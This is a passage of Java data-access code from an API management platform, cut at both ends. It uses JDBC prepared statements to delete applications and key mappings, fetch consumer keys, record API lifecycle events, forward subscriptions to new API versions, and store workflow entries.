PreparedStatement deleteRegistrationQuery = null; PreparedStatement deleteSubscription = null; PreparedStatement deleteDomainApp = null; PreparedStatement deleteAppKey = null; PreparedStatement deleteApp = null; ResultSet rs = null; String getSubscriptionsQuery = SQLConstants.GET_SUBSCRIPTION_ID_OF_APPLICATION_SQL; String getConsumerKeyQuery = SQLConstants.GET_CONSUMER_KEY_OF_APPLICATION_SQL; String deleteKeyMappingQuery = SQLConstants.REMOVE_APPLICATION_FROM_SUBSCRIPTION_KEY_MAPPINGS_SQL; String deleteSubscriptionsQuery = SQLConstants.REMOVE_APPLICATION_FROM_SUBSCRIPTIONS_SQL; String deleteApplicationKeyQuery = SQLConstants.REMOVE_APPLICATION_FROM_APPLICATION_KEY_MAPPINGS_SQL; String deleteDomainAppQuery = SQLConstants.REMOVE_APPLICATION_FROM_DOMAIN_MAPPINGS_SQL; String deleteApplicationQuery = SQLConstants.REMOVE_APPLICATION_FROM_APPLICATIONS_SQL; String deleteRegistrationEntry = SQLConstants.REMOVE_APPLICATION_FROM_APPLICATION_REGISTRATIONS_SQL; boolean transactionCompleted = true; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); prepStmt = connection.prepareStatement(getSubscriptionsQuery); prepStmt.setInt(1, application.getId()); rs = prepStmt.executeQuery(); if (multiGroupAppSharingEnabled) { transactionCompleted = updateGroupIDMappings(connection, application.getId(), null, null); } List<Integer> subscriptions = new ArrayList<Integer>(); while (rs.next()) { subscriptions.add(rs.getInt("SUBSCRIPTION_ID")); } deleteMappingQuery = connection.prepareStatement(deleteKeyMappingQuery); for (Integer subscriptionId : subscriptions) { deleteMappingQuery.setInt(1, subscriptionId); deleteMappingQuery.addBatch(); } deleteMappingQuery.executeBatch(); if (log.isDebugEnabled()) { log.debug("Subscription Key mapping details are deleted successfully for Application - " + application.getName()); } deleteRegistrationQuery = connection.prepareStatement(deleteRegistrationEntry); deleteRegistrationQuery.setInt(1, application.getId()); deleteRegistrationQuery.execute(); if (log.isDebugEnabled()) { log.debug("Application Registration details are deleted successfully for Application - " + application.getName()); } deleteSubscription = connection.prepareStatement(deleteSubscriptionsQuery); deleteSubscription.setInt(1, application.getId()); deleteSubscription.execute(); if (log.isDebugEnabled()) { log.debug("Subscription details are deleted successfully for Application - " + application.getName()); } prepStmtGetConsumerKey = connection.prepareStatement(getConsumerKeyQuery); prepStmtGetConsumerKey.setInt(1, application.getId()); rs = prepStmtGetConsumerKey.executeQuery(); ArrayList<String> consumerKeys = new ArrayList<String>(); deleteDomainApp = connection.prepareStatement(deleteDomainAppQuery); while (rs.next()) { String consumerKey = rs.getString("CONSUMER_KEY"); // This is true when OAuth app has been created by pasting consumer key/secret in the screen. String mode = rs.getString("CREATE_MODE"); if (consumerKey != null) { deleteDomainApp.setString(1, consumerKey); deleteDomainApp.addBatch(); KeyManagerHolder.getKeyManagerInstance().deleteMappedApplication(consumerKey); // OAuth app is deleted if only it has been created from API Store. For mapped clients we don't // call delete. if (!"MAPPED".equals(mode)) { // Adding clients to be deleted. consumerKeys.add(consumerKey); } } } deleteDomainApp.executeBatch(); deleteAppKey = connection.prepareStatement(deleteApplicationKeyQuery); deleteAppKey.setInt(1, application.getId()); deleteAppKey.execute(); if (log.isDebugEnabled()) { log.debug("Application Key Mapping details are deleted successfully for Application - " + application .getName()); } deleteApp = connection.prepareStatement(deleteApplicationQuery); deleteApp.setInt(1, application.getId()); deleteApp.execute(); if (log.isDebugEnabled()) { log.debug("Application " + application.getName() + " is deleted successfully."); } if (transactionCompleted) { connection.commit(); } for (String consumerKey : consumerKeys) { //delete on oAuthorization server. KeyManagerHolder.getKeyManagerInstance().deleteApplication(consumerKey); } } catch (SQLException e) { handleException("Error while removing application details from the database", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmtGetConsumerKey, connection, rs); APIMgtDBUtil.closeAllConnections(prepStmt, null, rs); APIMgtDBUtil.closeAllConnections(deleteApp, null, null); APIMgtDBUtil.closeAllConnections(deleteAppKey, null, null); APIMgtDBUtil.closeAllConnections(deleteMappingQuery, null, null); APIMgtDBUtil.closeAllConnections(deleteRegistrationQuery, null, null); APIMgtDBUtil.closeAllConnections(deleteSubscription, null, null); APIMgtDBUtil.closeAllConnections(deleteDomainApp, null, null); APIMgtDBUtil.closeAllConnections(deleteAppKey, null, null); APIMgtDBUtil.closeAllConnections(deleteApp, null, null); } } public APIKey[] getConsumerKeysWithMode(int appId, String mode) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; ArrayList<APIKey> consumerKeys = new ArrayList<APIKey>(); String getConsumerKeyQuery = SQLConstants.GET_CONSUMER_KEY_WITH_MODE_SLQ; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); prepStmt = connection.prepareStatement(getConsumerKeyQuery); prepStmt.setInt(1, appId); prepStmt.setString(2, mode); rs = prepStmt.executeQuery(); while (rs.next()) { String consumerKey = rs.getString("CONSUMER_KEY"); if (consumerKey != null && !consumerKey.isEmpty()) { APIKey apiKey = new APIKey(); apiKey.setConsumerKey(consumerKey); apiKey.setType(rs.getString("KEY_TYPE")); consumerKeys.add(apiKey); } } } catch (SQLException e) { String msg = "Error occurred while getting consumer keys"; log.error(msg, e); throw new APIManagementException(msg, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return consumerKeys.toArray(new APIKey[consumerKeys.size()]); } /** * Returns the consumer Key for a given Application Name, Subscriber Name, Key Type, Grouping Id combination. * * @param applicationName Name of the Application. * @param subscriberId Name of Subscriber. * @param keyType PRODUCTION | SANDBOX. * @param groupingId Grouping ID. When set to null query will be performed using the other three values. * @return Consumer Key matching the provided combination. * @throws APIManagementException */ public String getConsumerKeyForApplicationKeyType(String applicationName, String subscriberId, String keyType, String groupingId) throws APIManagementException { String consumerKey = null; Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_CONSUMER_KEY_FOR_APPLICATION_KEY_TYPE_SQL; String whereSubscriberUserID = "SUB.USER_ID = ?"; if (forceCaseInsensitiveComparisons) { whereSubscriberUserID = "lower(SUB.USER_ID) = ?"; subscriberId = subscriberId.toLowerCase(); } String whereClauseWithGroupId = " AND " + "(APP.GROUP_ID= ? OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL) AND " + whereSubscriberUserID + "))"; String whereClauseWithMultiGroupId = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR " + whereSubscriberUserID + ")"; String whereClause = " AND " + whereSubscriberUserID; try { connection = APIMgtDBUtil.getConnection(); if (groupingId != null && !"null".equals(groupingId) && !groupingId.isEmpty()) { if (multiGroupAppSharingEnabled) { Subscriber subscriber = getSubscriber(subscriberId); String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); String groupIDArray[] = groupingId.split(","); sqlQuery += whereClauseWithMultiGroupId; prepStmt = fillQueryParams(connection, sqlQuery, groupIDArray, 3); prepStmt.setString(1, applicationName); prepStmt.setString(2, keyType); int paramIndex = groupIDArray.length + 2; prepStmt.setString(++paramIndex, tenantDomain); prepStmt.setString(++paramIndex, subscriberId); } else { sqlQuery += whereClauseWithGroupId; prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, applicationName); prepStmt.setString(2, keyType); prepStmt.setString(3, groupingId); prepStmt.setString(4, subscriberId); } } else { sqlQuery += whereClause; prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, applicationName); prepStmt.setString(2, keyType); prepStmt.setString(3, subscriberId); } rs = prepStmt.executeQuery(); while (rs.next()) { consumerKey = rs.getString("CONSUMER_KEY"); } } catch (SQLException e) { handleException("Error when reading the application information from" + " the persistence store.", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return consumerKey; } /** * Returns the consumer Key for a given Application Name, Subscriber Name, Key Type, Grouping Id combination. * * @param applicationId Id of the Application. * @param subscriberId Name of Subscriber. * @param keyType PRODUCTION | SANDBOX. * @param groupingId Grouping ID. When set to null query will be performed using the other three values. * @return Consumer Key matching the provided combination. * @throws APIManagementException */ public String getConsumerKeyForApplicationKeyType(int applicationId, String subscriberId, String keyType, String groupingId) throws APIManagementException { String consumerKey = null; Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_CONSUMER_KEY_FOR_APPLICATION_KEY_TYPE_BY_APP_ID_SQL; String whereSubscriberUserID = "SUB.USER_ID = ?"; if (forceCaseInsensitiveComparisons) { whereSubscriberUserID = "lower(SUB.USER_ID) = ?"; subscriberId = subscriberId.toLowerCase(); } String whereClauseWithGroupId = " AND " + "(APP.GROUP_ID= ? OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL) AND " + whereSubscriberUserID + "))"; String whereClauseWithMultiGroupId = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR " + whereSubscriberUserID + ")"; String whereClause = " AND " + whereSubscriberUserID; try { connection = APIMgtDBUtil.getConnection(); if (groupingId != null && !"null".equals(groupingId) && !groupingId.isEmpty()) { if (multiGroupAppSharingEnabled) { Subscriber subscriber = getSubscriber(subscriberId); String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); String groupIDArray[] = groupingId.split(","); sqlQuery += whereClauseWithMultiGroupId; prepStmt = fillQueryParams(connection, sqlQuery, groupIDArray, 3); prepStmt.setInt(1, applicationId); prepStmt.setString(2, keyType); int paramIndex = groupIDArray.length + 2; prepStmt.setString(++paramIndex, tenantDomain); prepStmt.setString(++paramIndex, subscriberId); } else { sqlQuery += whereClauseWithGroupId; prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setInt(1, applicationId); prepStmt.setString(2, keyType); prepStmt.setString(3, groupingId); prepStmt.setString(4, subscriberId); } } else { sqlQuery += whereClause; prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setInt(1, applicationId); prepStmt.setString(2, keyType); prepStmt.setString(3, subscriberId); } rs = prepStmt.executeQuery(); while (rs.next()) { consumerKey = rs.getString("CONSUMER_KEY"); } } catch (SQLException e) { handleException("Error when reading the application information from the persistence store.", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return consumerKey; } /** * This method will return a java Map that contains application ID and token type. * * @param consumerKey consumer key of the oAuth application. * @return Map. * @throws APIManagementException */ public Map<String, String> getApplicationIdAndTokenTypeByConsumerKey(String consumerKey) throws APIManagementException { Map<String, String> appIdAndConsumerKey = new HashMap<String, String>(); if (log.isDebugEnabled()) { log.debug("fetching application id and token type by consumer key " + consumerKey); } Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_APPLICATION_ID_BY_CONSUMER_KEY_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, consumerKey); rs = prepStmt.executeQuery(); while (rs.next()) { appIdAndConsumerKey.put("application_id", rs.getString("APPLICATION_ID")); appIdAndConsumerKey.put("token_type", rs.getString("KEY_TYPE")); } } catch (SQLException e) { handleException("Error when reading application subscription information", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return appIdAndConsumerKey; } /* Delete mapping record by given consumer key */ public void deleteApplicationKeyMappingByConsumerKey(String consumerKey) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); String deleteKeyMappingQuery = SQLConstants.DELETE_APPLICATION_KEY_MAPPING_BY_CONSUMER_KEY_SQL; if (log.isDebugEnabled()) { log.debug("trying to delete key mapping for consumer id " + consumerKey); } ps = connection.prepareStatement(deleteKeyMappingQuery); ps.setString(1, consumerKey); ps.executeUpdate(); connection.commit(); } catch (SQLException e) { handleException("Error while removing application mapping table", e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, null); } } /** * This method will delete a record from AM_APPLICATION_REGISTRATION * * @param applicationId * @param tokenType */ public void deleteApplicationKeyMappingByApplicationIdAndType(String applicationId, String tokenType) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); String deleteRegistrationEntry = SQLConstants.DELETE_APPLICATION_KEY_MAPPING_BY_APPLICATION_ID_SQL; if (log.isDebugEnabled()) { log.debug("trying to delete a record from AM_APPLICATION_KEY_MAPPING table by application ID " + applicationId + " and Token type" + tokenType); } ps = connection.prepareStatement(deleteRegistrationEntry); ps.setInt(1, Integer.parseInt(applicationId)); ps.setString(2, tokenType); ps.executeUpdate(); connection.commit(); } catch (SQLException e) { handleException("Error while removing AM_APPLICATION_KEY_MAPPING table", e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, null); } } /** * Delete a record from AM_APPLICATION_REGISTRATION table by application ID and token type. * * @param applicationId APIM application ID. * @param tokenType Token type (PRODUCTION || SANDBOX) * @throws APIManagementException if failed to delete the record. */ public void deleteApplicationRegistration(String applicationId, String tokenType) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); String deleteRegistrationEntry = SQLConstants.REMOVE_FROM_APPLICATION_REGISTRANTS_SQL; if (log.isDebugEnabled()) { log.debug("trying to delete a record from AM_APPLICATION_REGISTRATION table by application ID " + applicationId + " and Token type" + tokenType); } ps = connection.prepareStatement(deleteRegistrationEntry); ps.setInt(1, Integer.parseInt(applicationId)); ps.setString(2, tokenType); ps.executeUpdate(); connection.commit(); } catch (SQLException e) { handleException("Error while removing AM_APPLICATION_REGISTRATION table", e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, null); } } /** * returns a subscriber record for given username,tenant Id * * @param username UserName * @param tenantId Tenant Id * @param connection * @return Subscriber * @throws APIManagementException if failed to get subscriber */ private Subscriber getSubscriber(String username, int tenantId, Connection connection) throws APIManagementException { PreparedStatement prepStmt = null; ResultSet rs = null; Subscriber subscriber = null; String sqlQuery; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_SUBSCRIBER_CASE_INSENSITIVE_SQL; } else { sqlQuery = SQLConstants.GET_SUBSCRIBER_DETAILS_SQL; } try { prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, username); prepStmt.setInt(2, tenantId); rs = prepStmt.executeQuery(); if (rs.next()) { subscriber = new Subscriber(rs.getString("USER_ID")); subscriber.setEmail(rs.getString("EMAIL_ADDRESS")); subscriber.setId(rs.getInt("SUBSCRIBER_ID")); subscriber.setSubscribedDate(rs.getDate("DATE_SUBSCRIBED")); subscriber.setTenantId(rs.getInt("TENANT_ID")); return subscriber; } } catch (SQLException e) { handleException("Error when reading the application information from" + " the persistence store.", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, null, rs); } return subscriber; } public void recordAPILifeCycleEvent(APIIdentifier identifier, APIStatus oldStatus, APIStatus newStatus, String userId, int tenantId) throws APIManagementException { Connection conn = null; try { conn = APIMgtDBUtil.getConnection(); recordAPILifeCycleEvent(identifier, oldStatus.toString(), newStatus.toString(), userId, tenantId, conn); } catch (SQLException e) { handleException("Failed to record API state change", e); } finally { APIMgtDBUtil.closeAllConnections(null, conn, null); } } public void recordAPILifeCycleEvent(APIIdentifier identifier, String oldStatus, String newStatus, String userId, int tenantId) throws APIManagementException { Connection conn = null; try { conn = APIMgtDBUtil.getConnection(); recordAPILifeCycleEvent(identifier, oldStatus, newStatus, userId, tenantId, conn); } catch (SQLException e) { handleException("Failed to record API state change", e); } finally { APIMgtDBUtil.closeAllConnections(null, conn, null); } } public void recordAPILifeCycleEvent(APIIdentifier identifier, String oldStatus, String newStatus, String userId, int tenantId, Connection conn) throws APIManagementException { //Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; PreparedStatement selectQuerySt = null; int apiId = -1; if (oldStatus == null && !newStatus.equals(APIConstants.CREATED)) { String msg = "Invalid old and new state combination"; log.error(msg); throw new APIManagementException(msg); } else if (oldStatus != null && oldStatus.equals(newStatus)) { String msg = "No measurable differences in API state"; log.error(msg); throw new APIManagementException(msg); } String getAPIQuery = SQLConstants.GET_API_ID_SQL; String sqlQuery = SQLConstants.ADD_API_LIFECYCLE_EVENT_SQL; try { conn.setAutoCommit(false); selectQuerySt = conn.prepareStatement(getAPIQuery); selectQuerySt.setString(1, APIUtil.replaceEmailDomainBack(identifier.getProviderName())); selectQuerySt.setString(2, identifier.getApiName()); selectQuerySt.setString(3, identifier.getVersion()); resultSet = selectQuerySt.executeQuery(); if (resultSet.next()) { apiId = resultSet.getInt("API_ID"); } if (apiId == -1) { String msg = "Unable to find the API: " + identifier + " in the database"; log.error(msg); throw new APIManagementException(msg); } ps = conn.prepareStatement(sqlQuery); ps.setInt(1, apiId); if (oldStatus != null) { ps.setString(2, oldStatus); } else { ps.setNull(2, Types.VARCHAR); } ps.setString(3, newStatus); ps.setString(4, userId); ps.setInt(5, tenantId); ps.setTimestamp(6, new Timestamp(System.currentTimeMillis())); ps.executeUpdate(); // finally commit transaction conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback the API state change record", e1); } } handleException("Failed to record API state change", e); } finally { APIMgtDBUtil.closeAllConnections(selectQuerySt, null, null); APIMgtDBUtil.closeAllConnections(ps, null, resultSet); } } public void updateDefaultAPIPublishedVersion(APIIdentifier identifier, String oldStatus, String newStatus) throws APIManagementException { Connection conn = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); if (!oldStatus.equals(newStatus)) { if ((APIConstants.CREATED.equals(newStatus) || APIConstants.RETIRED.equals(newStatus)) && ( APIConstants.PUBLISHED.equals(oldStatus) || APIConstants.DEPRECATED.equals(oldStatus) || APIConstants.BLOCKED.equals(oldStatus))) { setPublishedDefVersion(identifier, conn, null); } else if (APIConstants.PUBLISHED.equals(newStatus) || APIConstants.DEPRECATED.equals(newStatus) || APIConstants.BLOCKED.equals(newStatus)) { setPublishedDefVersion(identifier, conn, identifier.getVersion()); } } conn.commit(); } catch (SQLException e) { handleException("Failed to update published default API state change", e); } finally { APIMgtDBUtil.closeAllConnections(null, conn, null); } } public List<LifeCycleEvent> getLifeCycleEvents(APIIdentifier apiId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_LIFECYCLE_EVENT_SQL; List<LifeCycleEvent> events = new ArrayList<LifeCycleEvent>(); try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, APIUtil.replaceEmailDomainBack(apiId.getProviderName())); prepStmt.setString(2, apiId.getApiName()); prepStmt.setString(3, apiId.getVersion()); rs = prepStmt.executeQuery(); while (rs.next()) { LifeCycleEvent event = new LifeCycleEvent(); event.setApi(apiId); String oldState = rs.getString("PREVIOUS_STATE"); //event.setOldStatus(oldState != null ? APIStatus.valueOf(oldState) : null); event.setOldStatus(oldState != null ? oldState : null); //event.setNewStatus(APIStatus.valueOf(rs.getString("NEW_STATE"))); event.setNewStatus(rs.getString("NEW_STATE")); event.setUserId(rs.getString("USER_ID")); event.setDate(rs.getTimestamp("EVENT_DATE")); events.add(event); } Collections.sort(events, new Comparator<LifeCycleEvent>() { public int compare(LifeCycleEvent o1, LifeCycleEvent o2) { return o1.getDate().compareTo(o2.getDate()); } }); } catch (SQLException e) { handleException("Error when executing the SQL : " + sqlQuery, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return events; } public void makeKeysForwardCompatible(String provider, String apiName, String oldVersion, String newVersion, String context) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; PreparedStatement addSubKeySt = null; PreparedStatement getAppSt = null; ResultSet rs = null; String getSubscriptionDataQuery = SQLConstants.GET_SUBSCRIPTION_DATA_SQL; String addSubKeyMapping = SQLConstants.ADD_SUBSCRIPTION_KEY_MAPPING_SQL; String getApplicationDataQuery = SQLConstants.GET_APPLICATION_DATA_SQL; try { // Retrieve all the existing subscription for the old version connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(getSubscriptionDataQuery); prepStmt.setString(1, APIUtil.replaceEmailDomainBack(provider)); prepStmt.setString(2, apiName); prepStmt.setString(3, oldVersion); rs = prepStmt.executeQuery(); List<SubscriptionInfo> subscriptionData = new ArrayList<SubscriptionInfo>(); Set<Integer> subscribedApplications = new HashSet<Integer>(); while (rs.next() && !(APIConstants.SubscriptionStatus.ON_HOLD.equals(rs.getString("SUB_STATUS")))) { SubscriptionInfo info = new SubscriptionInfo(); info.subscriptionId = rs.getInt("SUBSCRIPTION_ID"); info.tierId = rs.getString("TIER_ID"); info.applicationId = rs.getInt("APPLICATION_ID"); info.accessToken = rs.getString("ACCESS_TOKEN"); // no decryption needed. info.tokenType = rs.getString("KEY_TYPE"); subscriptionData.add(info); } Map<Integer, Integer> subscriptionIdMap = new HashMap<Integer, Integer>(); APIIdentifier apiId = new APIIdentifier(provider, apiName, newVersion); for (SubscriptionInfo info : subscriptionData) { try { if (!subscriptionIdMap.containsKey(info.subscriptionId)) { apiId.setTier(info.tierId); int subscriptionId = addSubscription(apiId, context, info.applicationId, APIConstants .SubscriptionStatus.UNBLOCKED, provider); if (subscriptionId == -1) { String msg = "Unable to add a new subscription for the API: " + apiName + ":v" + newVersion; log.error(msg); throw new APIManagementException(msg); } subscriptionIdMap.put(info.subscriptionId, subscriptionId); } int subscriptionId = subscriptionIdMap.get(info.subscriptionId); connection.setAutoCommit(false); addSubKeySt = connection.prepareStatement(addSubKeyMapping); addSubKeySt.setInt(1, subscriptionId); addSubKeySt.setString(2, info.accessToken); addSubKeySt.setString(3, info.tokenType); addSubKeySt.execute(); connection.commit(); subscribedApplications.add(info.applicationId); // catching the exception because when copy the api without the option "require re-subscription" // need to go forward rather throwing the exception } catch (SubscriptionAlreadyExistingException e) { log.error("Error while adding subscription " + e.getMessage(), e); } } getAppSt = connection.prepareStatement(getApplicationDataQuery); getAppSt.setString(1, APIUtil.replaceEmailDomainBack(provider)); getAppSt.setString(2, apiName); getAppSt.setString(3, oldVersion); rs = getAppSt.executeQuery(); while (rs.next()) { int applicationId = rs.getInt("APPLICATION_ID"); if (!subscribedApplications.contains(applicationId)) { apiId.setTier(rs.getString("TIER_ID")); try { addSubscription(apiId, rs.getString("CONTEXT"), applicationId, APIConstants .SubscriptionStatus.UNBLOCKED, provider); // catching the exception because when copy the api without the option "require re-subscription" // need to go forward rather throwing the exception } catch (SubscriptionAlreadyExistingException e) { //Not handled as an error because same subscription can be there in many previous versions. //Ex: if previous version was created by another older version and if the subscriptions are //Forwarded, then the third one will get same subscription from previous two versions. log.info("Subscription already exists: " + e.getMessage()); } } } } catch (SQLException e) { handleException("Error when executing the SQL queries", e); } finally { APIMgtDBUtil.closeAllConnections(getAppSt, null, null); APIMgtDBUtil.closeAllConnections(addSubKeySt, null, null); APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } } public void addAPI(API api, int tenantId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; String query = SQLConstants.ADD_API_SQL; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); prepStmt = connection.prepareStatement(query, new String[]{"api_id"}); prepStmt.setString(1, APIUtil.replaceEmailDomainBack(api.getId().getProviderName())); prepStmt.setString(2, api.getId().getApiName()); prepStmt.setString(3, api.getId().getVersion()); prepStmt.setString(4, api.getContext()); String contextTemplate = api.getContextTemplate(); //Validate if the API has an unsupported context before executing the query String invalidContext = "/" + APIConstants.VERSION_PLACEHOLDER; if (invalidContext.equals(contextTemplate)) { throw new APIManagementException("Cannot add API : " + api.getId() + " with unsupported context : " + contextTemplate); } //If the context template ends with {version} this means that the version will be at the end of the context. if (contextTemplate.endsWith("/" + APIConstants.VERSION_PLACEHOLDER)) { //Remove the {version} part from the context template. contextTemplate = contextTemplate.split(Pattern.quote("/" + APIConstants.VERSION_PLACEHOLDER))[0]; } prepStmt.setString(5, contextTemplate); prepStmt.setString(6, APIUtil.replaceEmailDomainBack(api.getId().getProviderName())); prepStmt.setTimestamp(7, new Timestamp(System.currentTimeMillis())); prepStmt.setString(8, api.getApiLevelPolicy()); prepStmt.execute(); rs = prepStmt.getGeneratedKeys(); int apiId = -1; if (rs.next()) { apiId = rs.getInt(1); } connection.commit(); if (api.getScopes() != null) { synchronized (scopeMutex) { addScopes(api.getScopes(), api.getId(), apiId, tenantId); } } addURLTemplates(apiId, api, connection); String tenantUserName = MultitenantUtils .getTenantAwareUsername(APIUtil.replaceEmailDomainBack(api.getId().getProviderName())); recordAPILifeCycleEvent(api.getId(), null, APIStatus.CREATED.toString(), tenantUserName, tenantId, connection); //If the api is selected as default version, it is added/replaced into AM_API_DEFAULT_VERSION table if (api.isDefaultVersion()) { addUpdateAPIAsDefaultVersion(api, connection); } connection.commit(); } catch (SQLException e) { handleException("Error while adding the API: " + api.getId() + " to the database", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } } public String getDefaultVersion(APIIdentifier apiId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; String oldDefaultVersion = null; String query = SQLConstants.GET_DEFAULT_VERSION_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(query); prepStmt.setString(1, apiId.getApiName()); prepStmt.setString(2, APIUtil.replaceEmailDomainBack(apiId.getProviderName())); rs = prepStmt.executeQuery(); if (rs.next()) { oldDefaultVersion = rs.getString("DEFAULT_API_VERSION"); } } catch (SQLException e) { handleException("Error while getting default version for " + apiId.getApiName(), e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return oldDefaultVersion; } /** * Persists WorkflowDTO to Database * * @param workflow * @throws APIManagementException */ public void addWorkflowEntry(WorkflowDTO workflow) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; String query = SQLConstants.ADD_WORKFLOW_ENTRY_SQL; try { Timestamp cratedDateStamp = new Timestamp(workflow.getCreatedTime()); connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); prepStmt = connection.prepareStatement(query); prepStmt.setString(1, workflow.getWorkflowReference()); prepStmt.setString(2, workflow.getWorkflowType()); prepStmt.setString(3, workflow.getStatus().toString()); prepStmt.setTimestamp(4, cratedDateStamp); prepStmt.setString(5, workflow.getWorkflowDescription()); prepStmt.setInt(6, workflow.getTenantId()); prepStmt.setString(7, workflow.getTenantDomain()); prepStmt.setString(8, workflow.getExternalWorkflowReference()); prepStmt.execute(); connection.commit(); } catch (SQLException e) { handleException("Error while adding Workflow : " + workflow.getExternalWorkflowReference() + " to the " + "database", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, null); } } public void updateWorkflowStatus(WorkflowDTO workflowDTO) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; String query = SQLConstants.UPDATE_WORKFLOW_ENTRY_SQL; try { Timestamp updatedTimeStamp = new Timestamp(workflowDTO.getUpdatedTime()); connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); prepStmt = connection.prepareStatement(query); prepStmt.setString(1, workflowDTO.getStatus().toString()); prepStmt.setString(2, workflowDTO.getWorkflowDescription()); prepStmt.setString(3, workflowDTO.getExternalWorkflowReference()); prepStmt.execute(); connection.commit(); } catch (SQLException e) { handleException("Error while updating Workflow Status of workflow " + workflowDTO .getExternalWorkflowReference(), e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, null); } } /** * Returns a workflow object for a given external workflow reference. * * @param workflowReference * @return * @throws APIManagementException */ public WorkflowDTO retrieveWorkflow(String workflowReference) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; WorkflowDTO workflowDTO = null; String query = SQLConstants.GET_ALL_WORKFLOW_ENTRY_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(query); prepStmt.setString(1, workflowReference); rs = prepStmt.executeQuery(); while (rs.next()) { workflowDTO = WorkflowExecutorFactory.getInstance().createWorkflowDTO(rs.getString("WF_TYPE")); workflowDTO.setStatus(WorkflowStatus.valueOf(rs.getString("WF_STATUS"))); workflowDTO.setExternalWorkflowReference(rs.getString("WF_EXTERNAL_REFERENCE")); workflowDTO.setCreatedTime(rs.getTimestamp("WF_CREATED_TIME").getTime()); workflowDTO.setWorkflowReference(rs.getString("WF_REFERENCE")); workflowDTO.setTenantDomain(rs.getString("TENANT_DOMAIN")); workflowDTO.setTenantId(rs.getInt("TENANT_ID")); workflowDTO.setWorkflowDescription(rs.getString("WF_STATUS_DESC")); } } catch (SQLException e) { handleException("Error while retrieving workflow details for " + workflowReference, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return workflowDTO; } /** * Returns a workflow object for a given internal workflow reference and the workflow type. * * @param workflowReference * @param workflowType * @return * @throws APIManagementException */ public WorkflowDTO retrieveWorkflowFromInternalReference(String workflowReference, String workflowType) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; WorkflowDTO workflowDTO = null; String query = SQLConstants.GET_ALL_WORKFLOW_ENTRY_FROM_INTERNAL_REF_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(query); prepStmt.setString(1, workflowReference); prepStmt.setString(2, workflowType); rs = prepStmt.executeQuery(); while (rs.next()) { workflowDTO = WorkflowExecutorFactory.getInstance().createWorkflowDTO(rs.getString("WF_TYPE")); workflowDTO.setStatus(WorkflowStatus.valueOf(rs.getString("WF_STATUS"))); 